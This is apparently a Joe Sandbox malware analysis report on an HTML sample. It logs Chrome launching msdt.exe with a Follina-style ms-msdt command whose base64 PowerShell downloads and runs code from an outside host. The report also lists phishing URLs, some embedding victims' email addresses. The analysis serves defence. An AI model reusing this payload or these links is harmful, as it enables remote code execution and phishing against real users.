Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C7E2C3 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,DeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,DeleteCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,	27_2_00C7E2C3
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C7FE00 SetUnhandledExceptionFilter,	27_2_00C7FE00
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C7F886 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00C7F886
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C8323D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00C8323D
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C7E4E6 EnterCriticalSection,SetUnhandledExceptionFilter,	27_2_00C7E4E6
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C7FC6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00C7FC6A
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C7E553 SetUnhandledExceptionFilter,LeaveCriticalSection,	27_2_00C7E553

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22	Jump to behavior

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C759D6 GetSecurityDescriptorDacl,SetSecurityDescriptorDacl,

27_2_00C759D6

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C78FB3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

27_2_00C78FB3

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C7FAC3 cpuid

27_2_00C7FAC3

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C73047 GetLocalTime,GetCurrentThreadId,GetCurrentProcessId,

27_2_00C73047

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C78E0B GetVersionExW,GetProcAddress,FreeLibrary,

27_2_00C78E0B

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	Path Interception	1 Process Injection	3 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	3 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	3 Security Software Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	14 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1.html	32%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	0%	Virustotal	Browse
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	0%	Metadefender	Browse
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://dns.google	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
accounts.google.com	142.251.209.13	true	false	high
clients.l.google.com	142.250.184.78	true	false	high
clients2.google.com	unknown	unknown	false	high
time.windows.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dns.google	176bd4d4-b466-471c-b2dc-78592e59bf93.tmp.1.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 24aeaaec-c6e1-418d-ae0b-78d4b9410155.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	false	URL Reputation: safe	unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p	craw_window.js.0.dr, craw_background.js.0.dr	false		high
https://www.google.com/intl/en-US/chrome/blank.html	craw_background.js.0.dr	false		high
https://ogs.google.com	a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	false		high
https://www.google.com/images/cleardot.gif	craw_window.js.0.dr	false		high
https://play.google.com	a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	false		high
https://payments.google.com/payments/v4/js/integrator.js	craw_window.js.0.dr, manifest.json.0.dr	false		high
https://easylist.to/)	LICENSE.txt.0.dr	false		high
https://sandbox.google.com/payments/v4/js/integrator.js	craw_window.js.0.dr, manifest.json.0.dr	false		high
https://www.google.com/images/x2.gif	craw_window.js.0.dr	false		high
https://accounts.google.com/MergeSession	craw_window.js.0.dr	false		high
https://creativecommons.org/compatiblelicenses	LICENSE.txt.0.dr	false		high
https://www.google.com	a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	false		high
https://www.google.com/images/dot2.gif	craw_window.js.0.dr	false		high
https://github.com/easylist)	LICENSE.txt.0.dr	false		high
https://creativecommons.org/.	LICENSE.txt.0.dr	false		high
https://accounts.google.com	a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	false		high
https://clients2.googleusercontent.com	a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	false		high
https://apis.google.com	a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	false		high
https://www.google.com/accounts/OAuthLogin?issueuberauth=1	craw_window.js.0.dr	false		high
https://www.google.com/	manifest.json.0.dr	false		high
https://www-googleapis-staging.sandbox.google.com	craw_window.js.0.dr, craw_background.js.0.dr	false		high
https://clients2.google.com	a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr	false		high
https://clients2.google.com/service/update2/crx	manifest.json.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.184.78	clients.l.google.com	United States	15169	GOOGLEUS	false
142.251.209.13	accounts.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	638689
Start date and time: 03/06/202211:09:08	2022-06-03 11:09:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1.html
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.expl.winHTML@35/121@3/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.9% (good quality ratio 94.4%) Quality average: 80.1% Quality standard deviation: 27.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 39 Number of non-executed functions: 78
Cookbook Comments:	Found application associated with file extension: .html Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 34.104.35.123, 142.250.184.35, 142.250.184.99, 142.250.184.67, 40.119.148.38
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, twc.trafficmanager.net, clientservices.googleapis.com, arc.msn.com, ris.api.iris.microsoft.com, redirector.gvt1.com, edgedl.me.gvt1.com, store-images.s-microsoft.com, login.live.com, r5---sn-4g5lzney.gvt1.com, sls.update.microsoft.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
239.255.255.250	https://sge-faeebb.webflow.io/	Get hash	malicious	Browse
	http://pq.ygzne.bottegatoscana.com.hk//#.aHR0cHM6Ly9yb21tZWRpY2FsLnJvLzBhZG1pbi8/ZT1jZWRpQG5vdm96eW1lcy5jb20=	Get hash	malicious	Browse
	https://jobsnet.ro/itu/?e=M_C@jhancock.com	Get hash	malicious	Browse
	https://chatcorpobueno.com.br/mensagem/src/AuthTypes/sin.php?email=alesa.pirnat@knaufinsulation.com	Get hash	malicious	Browse
	https://profidecorconcept.ro/ooo/?e=banksolutions@manulife.com	Get hash	malicious	Browse
	https://li.sten.to/wzj87moc	Get hash	malicious	Browse
	https://li.sten.to/wzj87moc	Get hash	malicious	Browse
	https://1drv.ms/b/s!ArCPMIukJGImaRrGpwLo-teYyaY	Get hash	malicious	Browse
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fbutlerfarming.talentlms.com%2fshared%2fstart%2fkey%3aLZGIDNHR&c=E,1,wzSF3mD1ZMXSCV4cg8fx1yMW1oWfg6-01f8-3JjQ1I-cJI3xJv4UsVSGMSDERUZtOJYN7qjIG-NYUikTzyoaFGthqYoG3klGTELdBPneRgU0o7TUtu2qW56frw,,&typo=1	Get hash	malicious	Browse
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fbutlerfarming.talentlms.com%2fshared%2fstart%2fkey%3aLZGIDNHR&c=E,1,Cz-4UFO7oMJIvKyivyOENlcNctBd6KKPmEf7rQ_zmvt_RrJlj5Zw4X_7Xqmmnq_eKVRghMmb1TbPguRX7oL0f0jzzp_6C0_YYu-4XjMPpREGwQBnwuGnmRlQdGVi&typo=1	Get hash	malicious	Browse
	http://links.notification.intuit.com/ls/click?upn=LEV65WI9EZ1l5TkUt4hKqzq6J49VEXJMRhUxqRckK3UK6eeEy0A-2FylQ0WpPN9IR9nATq3WhntsTLMCi919IHWIqv7F1Y0hsBmRz74brTyXW2vCIp0z7QWg-2F2Iqp2pkjkaLL5SIxQFWpIziK7m4WM4tt-2FoEcODYT-2BG3o73bKcA5ESCaanLohjTi7nDAgO9VS53ETpxkYd3M1Ic9aUnJYnPB1uuBMKsG1qmkQ1LUMFj6DdnJmgXWQvnvvsZXP-2Fmxu4Dv4xb2v5XJOqw8eDDV0yuA-3D-3DUjRg_EUCbtPHiT0A2-2FX2fuOagPZc2qiVakWpGVdeIfw1Ro2yrL4tyk7OvtfkrpSoApM3XIYkiY0TsPNQ-2BV1t4v0nJAV1oj-2B42wQ1DNUXnwDt0NL5FgjdY3FexuOqTrGRST251KpwBnPmu7mocg5HixiQucx3TA1aRTzH-2FoQTQ6nxgDKzkOK466JZA63BYRhIys2cDkQzoIIGbxLEiezdTeatTtReWn-2BkkP36-2BCXrWyX9SiHiCKTmptF7MXXYvescHiA-2BmZQ4-2F-2BICyzWZzrcsdoq0cqoIw4YyooDOC3K-2FJW3A6V9FSP2eqMcb-2FQvmK9qS0pE6qA6fETzrm6-2B1kBOU60T7GwSxkrtwdqklLKRYq51JtsXnqkKMhVrTkiLCI14SoWerbpwduAGcO5E9k7yGc5DqzaTSMAC6hfN5HdlGSBWtiX0Yl5t3hGTLH7D4IzeaLo0DHeNb-2FdRMVIXOsx5f39XSsAYuGk1-2Bm-2BaEF7kE20-2FZvLJFK-2FUZA0u-2Fizb0-2FLAxBktzYPuiLdnl3U0WCmFS-2BLTnLRHm3Uf31a-2FBYkCEbEgcFKz-2BebvQzNJ6Whaeglqf9usVS2bO7v4pp6x5YaUwLCWFlXA-3D-3D	Get hash	malicious	Browse
	https://inuitpayrollsystem.azurewebsites.net/start.php?path=verimvoice&mail=vplante-mcdonald@dbm.state.md.us	Get hash	malicious	Browse
	Invoice INV-0152.html	Get hash	malicious	Browse
	https://citizen.manukautech.info/zooom/wuzoeski/flygabbnoio/mkdirewtyu/XaSwETepVnEl.htm?zo=arentyou@adumbcunt.com.au	Get hash	malicious	Browse
	https://elperronoticias.com/aqa/iitspeaaeipqcersu	Get hash	malicious	Browse
	Fax Signed03 COMMISSION AGREEMENT-cms-cmck.com.htm	Get hash	malicious	Browse
	https://linkprotect.cudasvc.com/url?a=http%3a%2f%2facs.hcn.com.au%2f%3facc%3d36422%26url%3dhttp%3a%2f%2fwww.flow.page%2f1nd3l&c=E,1,bbLoXC8O9MO4MVhNuse-0hicSbWVQQAxbCr2BiVea6GnHp-pk1eY0BaRNYrVEyhSfWftlQqbLRFKjlIU0jqaHdEfXF-sMk73cANW1o27LnQslsJw10Gzsp1MEFDX&typo=1	Get hash	malicious	Browse
	https://viantgroup-com.preview-domain.com/rolo/RSVP/RSVP_365/index.htm	Get hash	malicious	Browse
	http://wv.dt3xd.bottegatoscana.com.hk//#.aHR0cHM6Ly9iYWZ5YmVpZGx0dzVhbnZ4MmI1aWozYm9pbXZhbmRyN2ZnazI3Zmt5dWxjcGRncXdxeG15NWNjeWpwNC5pcGZzLm5mdHN0b3JhZ2UubGluay8jRExNQVJTRE9TZWFkb21WZW50YXNJbnRlcm5hc0BzZWFib2FyZG1hcmluZS5jb20=	Get hash	malicious	Browse
	https://z.zz.ht/nJhTA.jpg	Get hash	malicious	Browse

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	http://pq.ygzne.bottegatoscana.com.hk//#.aHR0cHM6Ly9yb21tZWRpY2FsLnJvLzBhZG1pbi8/ZT1jZWRpQG5vdm96eW1lcy5jb20=	Get hash	malicious	Browse
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fbutlerfarming.talentlms.com%2fshared%2fstart%2fkey%3aLZGIDNHR&c=E,1,wzSF3mD1ZMXSCV4cg8fx1yMW1oWfg6-01f8-3JjQ1I-cJI3xJv4UsVSGMSDERUZtOJYN7qjIG-NYUikTzyoaFGthqYoG3klGTELdBPneRgU0o7TUtu2qW56frw,,&typo=1	Get hash	malicious	Browse
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fbutlerfarming.talentlms.com%2fshared%2fstart%2fkey%3aLZGIDNHR&c=E,1,Cz-4UFO7oMJIvKyivyOENlcNctBd6KKPmEf7rQ_zmvt_RrJlj5Zw4X_7Xqmmnq_eKVRghMmb1TbPguRX7oL0f0jzzp_6C0_YYu-4XjMPpREGwQBnwuGnmRlQdGVi&typo=1	Get hash	malicious	Browse
	Invoice INV-0152.html	Get hash	malicious	Browse
	https://citizen.manukautech.info/zooom/wuzoeski/flygabbnoio/mkdirewtyu/XaSwETepVnEl.htm?zo=arentyou@adumbcunt.com.au	Get hash	malicious	Browse
	Fax Signed03 COMMISSION AGREEMENT-cms-cmck.com.htm	Get hash	malicious	Browse
	https://linkprotect.cudasvc.com/url?a=http%3a%2f%2facs.hcn.com.au%2f%3facc%3d36422%26url%3dhttp%3a%2f%2fwww.flow.page%2f1nd3l&c=E,1,bbLoXC8O9MO4MVhNuse-0hicSbWVQQAxbCr2BiVea6GnHp-pk1eY0BaRNYrVEyhSfWftlQqbLRFKjlIU0jqaHdEfXF-sMk73cANW1o27LnQslsJw10Gzsp1MEFDX&typo=1	Get hash	malicious	Browse
	https://4cuyk8.axshare.com/	Get hash	malicious	Browse
	https://www.linkedin.com/slink?code=gY6-Fbqi??????sdjgkbdfkgndfklnhklhnhkldfnkglhnfgkln	Get hash	malicious	Browse
	https://imperialluxellc.com/cd/T-M/	Get hash	malicious	Browse
	Statement_73_-_Inv_re[060222]_545.htm	Get hash	malicious	Browse
	#U00aeInvoice Payment#U00ae.html	Get hash	malicious	Browse
	https://cloudflare-ipfs.com/ipfs/bafybeiak65sgacxopizijsuijcybkhwhgkhpj675rou3g6v7g3v6wm5sja#DATACENTER@GRAHAMGOLDENTECH.COM&d=DwMFAw	Get hash	malicious	Browse
	#Ud83d#UdcdeNBC303239-Csu.html	Get hash	malicious	Browse
	http://7j.qjvth.bottegatoscana.com.hk//#.aHR0cHM6Ly9uYXR1cmFtYXJrZXQucm8vYnYvP2U9TW9oYW1tZWQuUmlhekB0b2xsZ3JvdXAuY29t	Get hash	malicious	Browse
	horsetailtech.html	Get hash	malicious	Browse
	EFT-06.02.2022-Contract-Swift-INV.htm	Get hash	malicious	Browse
	DOC-AARONM _ 2ND_JUNE_2022 _.HTM	Get hash	malicious	Browse
	https://arturtjursh.com/Log%20in/	Get hash	malicious	Browse
	https://website16869056432.nicepage.io/Home.html	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Download File

Process:	C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	259472
Entropy (8bit):	6.621401853828968
Encrypted:	false
SSDEEP:	6144:wgtABO5wl1poLsQXo2fJjazGDJvvLAOk7CWn5l4rB+5Jb:wgtAFB+sQXo2ZRG7CWnaB+5Jb
MD5:	49AC3C96D270702A27B4895E4CE1F42A
SHA1:	55B90405F1E1B72143C64113E8BC65608DD3FD76
SHA-256:	82AA3FD6A25CDA9E16689CFADEA175091BE010CECAE537E517F392E0BEF5BA0F
SHA-512:	B62F6501CB4C992D42D9097E356805C88AC4AC5A46EAD4A8EEE9F8CBAE197B2305DA8AAB5B4A61891FE73951588025F2D642C32524B360687993F98C913138A0
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: Invoice INV-0152.html, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: Fax Signed03 COMMISSION AGREEMENT-cms-cmck.com.htm, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: Statement_73_-_Inv_re[060222]_545.htm, Detection: malicious, Browse Filename: #U00aeInvoice Payment#U00ae.html, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: #Ud83d#UdcdeNBC303239-Csu.html, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: horsetailtech.html, Detection: malicious, Browse Filename: EFT-06.02.2022-Contract-Swift-INV.htm, Detection: malicious, Browse Filename: DOC-AARONM _ 2ND_JUNE_2022 _.HTM, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;....zp..zp..zp...s.qzp...u..zp...t.\zp...s.izp...u.;zp...t.gzp...q.fzp..zq..{p...y.Ezp.....~zp..z..~zp...r.~zp.Rich.zp.................PE..L....a\|b.................V..........\|........p....@.......................... ......vI....@.................................Tl..........p2...............#...... $...\..T...........................(]..@............p..H............................text....U.......V.................. ..`.rdata.......p.......Z..............@..@.data...d'...........j..............@....rsrc...p2.......4...x..............@..@.reloc.. $.......&..................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crx

Download File

Process:	C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	145035
Entropy (8bit):	7.995615725071868
Encrypted:	true
SSDEEP:	3072:TdgEhmDf+E8VY0x81Rkc6L2oqzqkPEu30gZlc3G2ZknF:TyEhmDf+/+Fnkj6lEukgZyyF
MD5:	EA1C1FFD3EA54D1FB117BFDBB3569C60
SHA1:	10958B0F690AE8F5240E1528B1CCFFFF28A33272
SHA-256:	7C3A6A7D16AC44C3200F572A764BCE7D8FA84B9572DD028B15C59BDCCBC0A77D
SHA-512:	6C30728CAC9EAC53F0B27B7DBE2222DA83225C3B63617D6B271A6CFEDF18E8F0A8DFFA1053E1CBC4C5E16625F4BBC0D03AA306A946C9D72FAA4CEB779F8FFCAF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b..........S'.....2.{.....'....+.'.."..Y.x.ISa...)....H.&92..?!..~..F.5."...n,.B.-\|\.)..(..... ]G..j.-M)....C......o&L..0.K.....UtP.&.N...;..^w/a{)v...~KG;...?.1...k.c..D.U......J.6.`.G.5.x.k..[...i.A.@I^..I.<A. J...j.'.G.`.$q.N..Tdq]2]p.OF..#.#......'....8.3......0.."0....H.............0.............O..(...':19..O/.>....=.....m.n\.z..q.....JW..F......+H.Z+KGO.9....8.....U...&.y....,$...?.Eo.....\f/.Z..+M8...B.3'..Y.r...X.AS?.~..k..n....... Z...&.G....."n..........l.0v.x#<....Lx,-.w..-..d.....J.pT..('e~{%kQ.Q......rI.....Z....v.N.....J.d_......rX.......w@.b.[.c../V.'c...!.~.k..}z...U.S..nC......@.......Y..#.D.z.....5&.1O...X=p..2.F..P.6yP..>{.....HBX.*.E5....y..

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1772
Entropy (8bit):	6.019907048086037
Encrypted:	false
SSDEEP:	48:p/hPGxBJ7akeSpKssMLgWuG7bmTkfhs8vox:R9i7aaKssMUWuG7biIQx
MD5:	35C7E305A06F30D3F0A97693C3504265
SHA1:	B30C965F53A93676CC9D87D29F5E6AC5B605DD84
SHA-256:	3B6FB2683B4DFD83FDD0C6EE096F378AA85C6B1ACC73EC66288802A71C9381F7
SHA-512:	A6AC0DDC3C99D59A2C667410FE94BB8F267D1CF422C337FEBCFBAE23D5C965B0E965FF0B77FC88FA9E7B06EE6CE6D532B6ECB0D87A53FB282260EF812379EB7C
Malicious:	false
Reputation:	moderate, very likely benign file
